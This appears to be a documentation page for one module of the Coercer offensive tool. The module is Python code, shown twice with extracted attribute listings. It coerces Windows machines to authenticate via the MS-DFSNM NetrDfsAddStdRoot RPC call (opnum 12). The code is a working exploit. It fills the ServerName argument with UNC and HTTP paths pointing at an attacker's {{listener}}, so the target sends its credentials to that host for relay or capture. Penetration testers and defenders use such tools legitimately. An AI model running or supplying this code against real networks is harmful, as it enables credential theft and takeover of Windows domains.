coercer.methods.MS_DFSNM.NetrDfsAddStdRoot
1#!/usr/bin/env python3 2# -*- coding: utf-8 -*- 3# File name : NetrDfsAddStdRoot.py 4# Author : Podalirius (@podalirius_) 5# Date created : 14 Sep 2022 6 7from coercer.core.utils import gen_random_name 8from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL 9from coercer.network.DCERPCSessionError import DCERPCSessionError 10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT 11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID 12 13 14class _NetrDfsAddStdRoot(NDRCALL): 15 """ 16 Structure to make the RPC call to NetrDfsAddStdRoot() in MS-DFSNM Protocol 17 """ 18 opnum = 12 19 structure = ( 20 ('ServerName', WSTR), # Type: WCHAR * 21 ('RootShare', WSTR), # Type: WCHAR * 22 ('Comment', WSTR), # Type: WCHAR * 23 ('ApiFlags', DWORD), # Type: DWORD 24 ) 25 26 27class _NetrDfsAddStdRootResponse(NDRCALL): 28 """ 29 Structure to parse the response of the RPC call to NetrDfsAddStdRoot() in MS-DFSNM Protocol 30 """ 31 structure = () 32 33 34class NetrDfsAddStdRoot(MSPROTOCOLRPCCALL): 35 """ 36 Coercing a machine to authenticate using function NetrDfsAddStdRoot (opnum 12) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979) 37 38 Method found by: 39 - [@filip_dragovic](https://twitter.com/filip_dragovic) 40 """ 41 42 exploit_paths = [ 43 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 44 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 45 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 46 ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), 47 ] 48 49 access = { 50 "ncan_np": [ 51 { 52 "namedpipe": r"\PIPE\netdfs", 53 "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673", 54 "version": "3.0" 55 } 56 ], 57 "ncacn_ip_tcp": [ 58 { 59 "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673", 60 "version": "3.0" 61 } 62 ] 63 } 64 65 protocol = { 66 "longname": "[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol", 67 "shortname": "MS-DFSNM" 68 } 69 70 function = { 71 "name": "NetrDfsAddStdRoot", 72 "opnum": 12, 73 "vulnerable_arguments": ["ServerName"] 74 } 75 76 def trigger(self, dcerpc_session, target): 77 if dcerpc_session is not None: 78 try: 79 request = _NetrDfsAddStdRoot() 80 request['ServerName'] = self.path 81 request['RootShare'] = gen_random_name() + '\x00' 82 request['Comment'] = gen_random_name() + '\x00' 83 request['ApiFlags'] = 0 84 resp = dcerpc_session.request(request) 85 return "" 86 except Exception as err: 87 return err 88 else: 89 print("[!] Error: dce is None, you must call connect() first.") 90 return None
35class NetrDfsAddStdRoot(MSPROTOCOLRPCCALL): 36 """ 37 Coercing a machine to authenticate using function NetrDfsAddStdRoot (opnum 12) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979) 38 39 Method found by: 40 - [@filip_dragovic](https://twitter.com/filip_dragovic) 41 """ 42 43 exploit_paths = [ 44 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 45 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 46 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 47 ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), 48 ] 49 50 access = { 51 "ncan_np": [ 52 { 53 "namedpipe": r"\PIPE\netdfs", 54 "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673", 55 "version": "3.0" 56 } 57 ], 58 "ncacn_ip_tcp": [ 59 { 60 "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673", 61 "version": "3.0" 62 } 63 ] 64 } 65 66 protocol = { 67 "longname": "[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol", 68 "shortname": "MS-DFSNM" 69 } 70 71 function = { 72 "name": "NetrDfsAddStdRoot", 73 "opnum": 12, 74 "vulnerable_arguments": ["ServerName"] 75 } 76 77 def trigger(self, dcerpc_session, target): 78 if dcerpc_session is not None: 79 try: 80 request = _NetrDfsAddStdRoot() 81 request['ServerName'] = self.path 82 request['RootShare'] = gen_random_name() + '\x00' 83 request['Comment'] = gen_random_name() + '\x00' 84 request['ApiFlags'] = 0 85 resp = dcerpc_session.request(request) 86 return "" 87 except Exception as err: 88 return err 89 else: 90 print("[!] Error: dce is None, you must call connect() first.") 91 return None
Coercing a machine to authenticate using function NetrDfsAddStdRoot (opnum 12) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)
Method found by:
exploit_paths =
[('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access =
{'ncan_np': [{'namedpipe': '\\PIPE\\netdfs', 'uuid': '4fc742e0-4a10-11cf-8273-00aa004ae673', 'version': '3.0'}], 'ncacn_ip_tcp': [{'uuid': '4fc742e0-4a10-11cf-8273-00aa004ae673', 'version': '3.0'}]}
protocol =
{'longname': '[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol', 'shortname': 'MS-DFSNM'}
def
trigger(self, dcerpc_session, target):
77 def trigger(self, dcerpc_session, target): 78 if dcerpc_session is not None: 79 try: 80 request = _NetrDfsAddStdRoot() 81 request['ServerName'] = self.path 82 request['RootShare'] = gen_random_name() + '\x00' 83 request['Comment'] = gen_random_name() + '\x00' 84 request['ApiFlags'] = 0 85 resp = dcerpc_session.request(request) 86 return "" 87 except Exception as err: 88 return err 89 else: 90 print("[!] Error: dce is None, you must call connect() first.") 91 return None